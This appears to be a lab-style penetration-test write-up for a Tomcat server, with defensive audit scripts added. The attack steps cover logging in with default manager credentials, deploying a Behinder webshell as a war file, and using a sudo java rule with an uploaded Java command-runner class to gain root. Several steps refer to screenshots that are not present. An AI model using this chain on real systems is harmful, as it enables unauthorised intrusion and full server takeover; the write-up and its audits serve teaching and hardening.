Nmap port scan: ports 22 and 8080 are open.
Port 8080 serves the Tomcat manager interface; tried weak credentials and the Ghostcat (幽靈貓) AJP vulnerability.
(Ghostcat: this Tomcat version is outside the affected range.)
Weak credentials tomcat:tomcat work:
Build a Behinder (冰蠍) war package: jar cvf shell.war .\shell.jsp
Requesting the shell directly returns HTTP 500, but connecting through the Behinder client succeeds:
Open the virtual terminal and find that java can be run with sudo: (I clumsily changed the permissions on the sudoers file, and from then on sudo could not be run at all)
Next, upload Java code that executes system commands:
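The foothold here is a manager account with a shipped default password. As an added example (not part of the original writeup), the following Python audit reads a `tomcat-users.xml` and flags the conditions that made this deployment possible: a username/password pair from the well-known default list, a deploy-capable manager role backed by a plaintext password, and short passwords. The sample XML, the default-credential list and the `$`-field heuristic for digested passwords are assumptions made for the demo.

```python
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml for the demo (not taken from any real host).
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Xk9pQ2mRv7LwZ4tB" roles="manager-script"/>
  <user username="viewer" password="s3cret" roles="manager-status"/>
</tomcat-users>
"""

# Credential pairs that ship in example configs or are guessed first by scanners (assumed list).
DEFAULT_PAIRS = {
    ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("admin", "admin"), ("admin", "tomcat"),
    ("admin", ""), ("manager", "manager"), ("role1", "tomcat"), ("both", "tomcat"),
}

# Roles that allow deploying or administering applications: holding one of these
# means code execution on the server by design, so the password matters most here.
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}
MIN_PASSWORD_LEN = 12


def _local(tag):
    """Strip the XML namespace from an element tag ('{ns}user' -> 'user')."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return a list of (username, finding) tuples for a tomcat-users.xml document."""
    findings = []
    root = ET.fromstring(xml_text)
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username", "")
        pw = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        # Assumption: a digested credential (MessageDigestCredentialHandler style)
        # is stored as '$'-separated fields; anything else is treated as plaintext.
        digested = pw.count("$") >= 2
        if (name, pw) in DEFAULT_PAIRS:
            findings.append((name, "default-credentials"))
        if roles & DEPLOY_ROLES and not digested:
            findings.append((name, "manager-role-plaintext-password"))
        if not digested and len(pw) < MIN_PASSWORD_LEN:
            findings.append((name, "weak-password"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{user}: {finding}")
```

Run it against `$CATALINA_BASE/conf/tomcat-users.xml`; any `default-credentials` hit on an account holding a manager role is exactly the condition exploited above, and the fix is to remove or rename the account and restrict manager access to trusted networks.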
```java
import java.io.BufferedReader;
import java.io.Closeable;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.Arrays;
import java.util.List;
import java.util.StringTokenizer;

// Thin wrapper around ProcessBuilder: runs a command, captures stdout and stderr
// (merged) and returns the exit code together with the captured output.
public class ProcessUtils {
    private final static String DEFAULT_CHARSET_NAME = "UTF-8";

    public static Result run(String command) {
        return run(command, DEFAULT_CHARSET_NAME);
    }

    // Split a single command line on whitespace into an argument vector.
    public static Result run(String command, String charsetName) {
        StringTokenizer st = new StringTokenizer(command);
        String[] commandArray = new String[st.countTokens()];
        for (int i = 0; st.hasMoreTokens(); i++) {
            commandArray[i] = st.nextToken();
        }
        return run(Arrays.asList(commandArray), charsetName);
    }

    public static Result run(List<String> command) {
        return run(command, DEFAULT_CHARSET_NAME);
    }

    public static Result run(List<String> command, String charsetName) {
        Result result = new Result();
        InputStream is = null;
        try {
            // redirectErrorStream(true) merges stderr into stdout so one reader sees both.
            Process process = new ProcessBuilder(command).redirectErrorStream(true).start();
            is = process.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(is, charsetName));
            StringBuilder data = new StringBuilder();
            String line;
            while ((line = reader.readLine()) != null) {
                data.append(line).append(System.lineSeparator());
                // Echo each line in magenta so it stands out in the terminal.
                System.out.println("\033[0;35m" + line + "\033[0m");
            }
            result.code = process.waitFor();
            result.data = data.toString().trim();
        } catch (Exception e) {
            throw new RuntimeException(e);
        } finally {
            closeStreamQuietly(is);
        }
        return result;
    }

    private static void closeStreamQuietly(Closeable stream) {
        try {
            if (stream != null) {
                stream.close();
            }
        } catch (IOException e) {
            // ignore
        }
    }

    // Exit code plus captured output of the child process.
    public static class Result {
        public int code;
        public String data;
    }

    // Usage: java ProcessUtils <program> [args...]
    public static void main(String[] args) {
        Result r = ProcessUtils.run(Arrays.asList(args));
        System.out.println("code:" + r.code + "\ndata:" + r.data);
    }
}
```
Compile it on Windows and upload the class file to the server:
Then run the class through sudo java; the spawned process runs as root:
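The escalation works because the sudo rule grants an interpreter (java) rather than a fixed command, so whatever program the interpreter loads runs as root. As an added example covering both the `sudo -l` finding above and this final step (it is not code from the writeup), the Python script below parses a sudoers file and reports rules that hand a non-root user either `ALL` or an interpreter-style binary, noting whether `NOPASSWD` applies. The sample sudoers text, the interpreter list and the tag handling are assumptions for the demo; the parser covers plain user specs only, not aliases or `#include` files.

```python
import os
import re

# Constructed sudoers excerpt for the demo (not a real host's file).
SAMPLE_SUDOERS = """\
# constructed sample
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
tomcat  ALL=(root) NOPASSWD: /usr/bin/java
deploy  ALL=(root) /usr/bin/systemctl restart tomcat
backup  ALL=(ALL) NOPASSWD: ALL
"""

# Programs that execute whatever code or script they are handed; granting one of
# these via sudo is equivalent to granting an unrestricted root shell (assumed list).
INTERPRETERS = {"java", "python", "python2", "python3", "perl", "ruby", "node", "php", "sh", "bash"}

# Tags that may prefix a command in a Cmnd_Spec (subset of what sudoers(5) defines).
TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
        "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT"}

# user  host=(runas) commands
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")


def parse_sudoers(text):
    """Yield (user, runas, nopasswd, command) for every command in every user spec."""
    skip = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and #include lines
        if not line or line.startswith(skip):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = False   # in sudoers a tag persists across the rest of the command list
        for item in m.group("cmds").split(","):
            item = item.strip()
            while True:                        # peel off any leading "TAG:" prefixes
                tag, sep, rest = item.partition(":")
                tag = tag.strip().upper()
                if sep and tag in TAGS:
                    if tag == "NOPASSWD":
                        nopasswd = True
                    elif tag == "PASSWD":
                        nopasswd = False
                    item = rest.strip()
                else:
                    break
            yield m.group("user"), m.group("runas") or "root", nopasswd, item


def audit_sudoers(text):
    """Return findings for rules that let a non-root user run ALL or an interpreter."""
    findings = []
    for user, runas, nopasswd, command in parse_sudoers(text):
        if user == "root":
            continue
        program = command.split()[0] if command else ""
        if program == "ALL":
            reason = "unrestricted-ALL"
        elif os.path.basename(program) in INTERPRETERS:
            reason = "interpreter-runs-arbitrary-code"
        else:
            continue
        findings.append({"user": user, "runas": runas, "command": command,
                         "nopasswd": nopasswd, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        flag = "NOPASSWD " if f["nopasswd"] else ""
        print(f"{f['user']} -> ({f['runas']}) {flag}{f['command']}: {f['reason']}")
```

Run it with `sudo cat /etc/sudoers | python3 sudoers_audit.py`-style input or read the file directly as root. A hit like `tomcat -> (root) NOPASSWD /usr/bin/java` is the misconfiguration used above; the remedy is to grant the specific script or service command the account needs (with a fixed, root-owned path) instead of the interpreter itself.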